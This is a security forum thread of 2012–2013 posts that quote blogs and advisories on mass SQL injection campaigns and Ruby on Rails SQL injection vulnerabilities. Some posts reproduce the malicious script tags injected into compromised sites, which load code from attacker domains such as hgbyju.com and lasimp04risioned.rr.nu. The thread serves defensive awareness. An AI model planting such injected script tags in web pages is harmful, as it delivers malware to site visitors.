111 replies to this topic

[AplusWebMaster]

FYI...

Nikjju SQL injection update (now hgbyju .com/r.php)
- http://blog.sucuri.n...u-comr-php.html
April 22, 2012 - "We posted a few days ago about a Mass SQL injection campaign* that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju .com malware. However, since the last two days, the attackers switched domain names and are now using hgbyju .com to distribute their malware (also hosted at 31.210.100.242). So the following code is now getting added to the compromised web sites:
<script src = http ://hgbyju .com/r.php <</script> ..."
* http://blog.sucuri.n...ompromised.html
April 17, 2012
___

- https://isc.sans.edu...l?storyid=13036
Last Updated: 2012-04-24 00:17:18 UTC - "... resulting fake/rogue AV campaigns they subject victims to..."

- http://google.com/sa...site=nikjju.com
"... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
- http://google.com/sa...site=hgbyju.com
"... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
- http://google.com/sa...c?site=AS:42926
"... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."

Edited by AplusWebMaster, 24 April 2012 - 10:37 AM.

[AplusWebMaster]

FYI...

- http://blog.spiderla...d-analysis.html
01 May 2012
> https://www.owasp.or...ion_Cheat_Sheet
___

Automated Attacks - SQL injection and RFI/LFI attacks
- http://blog.imperva....ed-attacks.html
April 25, 2012 - "... cloud-security provider Incapsula published a study* showing that 31 percent of website traffic was -malicious- traffic... interesting is the speed and effectiveness of the hacks. How was it achieved? Automation. Automated hacks are not new. However, recently, we have noticed increased sophistication... this month’s Imperva’s latest Hacker Intelligence Initiative report** is to give a "state of the union" when it comes to automated attacks. Specifically, we describe the key tools and processes hackers use to automate SQL injection and RFI/LFI attacks. We believe these are the two most deployed attack methods and, as in any industry—automation, is a key indicator that someone wishes to achieve an economy of scale. Further, the automated tools being developed are sophisticated. This means:
• The script kiddies are hitting puberty. In other words, their attacks will be more effective and through.
• The pool of hackers is likely to increase. The ease of use of these tools is a key component of their appeal... hacking tools is a cottage industry trying to appeal to those hoping for a few online thrills.
Our report can be downloaded here**. The report details:
• Commonly used automated SQL injection and RFI/LFI tools.
• How to identify them when they hit your website.
• Some strategies needed to stop them."

* http://www.incapsula...m-your-business

** http://www.imperva.c...load.asp?id=360
PDF file - 12 pgs. - "... Summary and Conclusions: With automation, the odds of cyber attack are close to 100%. How can security teams prepare and stop malicious, automated site traffic in order to:
› Block attacks early and efficiently.
› Defend against 0 days.
› To save analysis resources by clustering all attack vectors related to the same attack to a single group. Detecting automation require abilities greater than plain signatures. Moreover, detecting bad automation must also allow non-malicious automation...
Contending with automated attacks requires:
› Rate-based detection mechanism: Automated tools often interact with sites at inhuman speeds. Signatures, however, are usually confined to single event. The ability to detect inhuman interactions is a key step.
› Missing or unique headers: Signatures are good at detecting existing pattern not in detecting missing pieces. Automated tools often lack headers, divulging their ulterior intentions. But malicious automation can be distinguished by its use of unique headers or payloads.
› Identify by using the experience of others (reputation): Automated attacks sources tend to attack many targets."

Edited by AplusWebMaster, 01 May 2012 - 02:53 PM.

[AplusWebMaster]

FYI...

Malware Analysis - compromised sites April 2012
- http://blog.sucuri.n...e-analysis.html
May 1, 2012 - "When we see a compromised site distributing malware, it is often done via 4 methods: Iframe, Javascript, Spam or internal redirections. Those are not the only ways, and they can be encoded or hidden differently internally on the sites, but the final output on the compromised sites is generally one of them:
1. Iframe injection: It makes the browser loads content from external (and malicious web sites)...
2. Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes...
3. .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or specific user agents/ referers) to malware or spam content.
4. Blackhat SEO spam: It is not really malware in the sense of the word (since it won’t infect anyone visiting the site), but it is still harmful for the webmaster and the site’s reputation (imagine a corporate site redirecting to a viagra online store).
- April / 2012 stats
Last month, we scanned a LOT of sites and many of them (107,616 to be more precise) were compromised. This is the breakdown per infection type:
• Iframe injection: 52.6%
• Javascript injection: 26.5%
• Blackhat SEO spam: 10.1%
• .htaccess redirections: 7.3%
• Other: 3% ..."
(More detail at the sucuri URL above.)

Edited by AplusWebMaster, 02 May 2012 - 09:20 AM.

[AplusWebMaster]

FYI...

Another SQL-i attack - njukol-dot–com ...
- https://www.f-secure...s/00002357.html
May 3, 2012 - "... the name is no longer as catchy as Lizamoon, the idea remains the same. This njukol .com is still pretty fresh out of the oven. The domain was registered last April 28*... the registrant of the domain is still the same with all those previous ones."
* https://www.f-secure.../registrant.png

- http://www.malwaredo...rdpress/?p=2644
April 29th, 2012 - "... add this to your block or shun list."

[AplusWebMaster]

FYI...

SQL injection... "lasimp04risioned"
- https://isc.sans.edu...l?storyid=13813
Last Updated: 2012-07-31 21:47:00 UTC - "It's been a while since we published the diary about the lilupophilupop SQL injection ( https://isc.sans.edu...l?storyid=12127 ) that back in January had infected LOTS of web sites. But guess what, they are b-aaa-ck, and are trying pretty much the same thing... decoded looks as...
<script src="http ://lasimp04risioned. rr.nu/sl.php"></script> ...
Searching for the injected "lasimp04risioned" URL via Google shows that the bad guys don't seem to be as 'successful' with this attack as last time, but this can change..."

2012-08-01 11:55:15 UTC: https://isc.sans.edu...d=13813#comment
(Also seen) ... <script src="http ://xinthesidersdown .com/sl.php"></script> ...

2012-08-02 16:29 UTC: https://isc.sans.edu...d=13813#comment
... hxxp: //eighbo02rsbarr. rr.nu/sl.php...

Edited by AplusWebMaster, 02 August 2012 - 04:20 PM.

[AplusWebMaster]

FYI...

SQL injection vuln - all Ruby on Rails...
- http://h-online.com/-1776203
3 Jan 2013 - "The Ruby on Rails developers are warning of an SQL injection vulnerability that affects all current versions of the web framework. New releases of Ruby on Rails – 3.2.10, 3.1.9 and 3.0.18 – are now available. It is recommended that all users update immediately. For users unable to update, there are patches available* for supported versions 3.2 and 3.1 and older versions 3.0 and 2.3. The problem, according to the advisory, is that, because of the way dynamic finders in ActiveRecord extract options from method parameters, a method parameter can be used as a scope and by carefully manipulating that scope, users can inject arbitrary SQL..."
* http://weblog.rubyon...-been-released/
Jan 2, 2013

- https://secunia.com/advisories/51697/
Last Update: 2013-01-04
Criticality level: Moderately critical
Impact: Manipulation of data
Where: From remote
... vulnerability is reported in versions prior to 3.0.18, prior to 3.1.9, and prior to 3.2.10.
Solution: Update to version 3.2.10, 3.1.9, or 3.0.18 or apply patch**.
** https://groups.googl...ity/DCNTNp_qjFM
___

- https://web.nvd.nist...d=CVE-2012-5664
Last revised: 01/08/2013 - "... consult CVE-2012-6496 and CVE-2012-6497 to determine which ID is appropriate..."
- http://web.nvd.nist....d=CVE-2012-6496 - 7.5 (HIGH)
Last revised: 01/07/2013
- http://web.nvd.nist....d=CVE-2012-6497 - 5.0
Last revised: 01/04/2013

Edited by AplusWebMaster, 09 January 2013 - 10:31 PM.

[AplusWebMaster]

FYI...

Ruby on Rails - Unsafe Queries ...
- http://www.securityt....com/id/1027960
CVE Reference: CVE-2013-0155
Jan 9 2013
Impact: Modification of system information
Fix Available: Yes Vendor Confirmed: Yes
Version(s): 3.x prior to versions 3.0.19, 3.1.10, and 3.2.11
Description: A vulnerability was reported in Ruby on Rails. A remote user can generate unsafe queries...
The vendor's advisories are available at:
- http://weblog.rubyon...-been-released/
Jan 8, 2013 - "... two extremely critical security fixes so please update IMMEDIATELY..."
- https://groups.googl...ity/t1WFuuQyavI

- http://www.securityt....com/id/1027961
CVE Reference: CVE-2013-0156
Jan 9 2013
Impact: Denial of service via network, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Version(s): 2.x and 3.x prior to versions 2.3.15, 3.0.19, 3.1.10, and 3.2.11
Description: A vulnerability was reported in Ruby on Rails. A remote user can bypass authentication systems, inject SQL commands, inject and execute arbitrary code, and cause denial of service conditions...
The vendor's advisories are available at:
- http://weblog.rubyon...-been-released/
- https://groups.google.com/forum/#!topic...ity/61bkgvnSGTQ
Jan 8, 2013 - "... either upgrade or use one of the work arounds *immediately*..."

- https://community.ra...d-cve-2013-0156
HD Moore - Jan 9, 2013

- https://secunia.com/advisories/51753/
Release Date: 2013-01-09
Criticality level: Highly critical
Impact: System access
Where: From remote...
Solution Status: Vendor Patch
CVE Reference(s): CVE-2013-0155, CVE-2013-0156

- http://h-online.com/-1780073
9 Jan 2013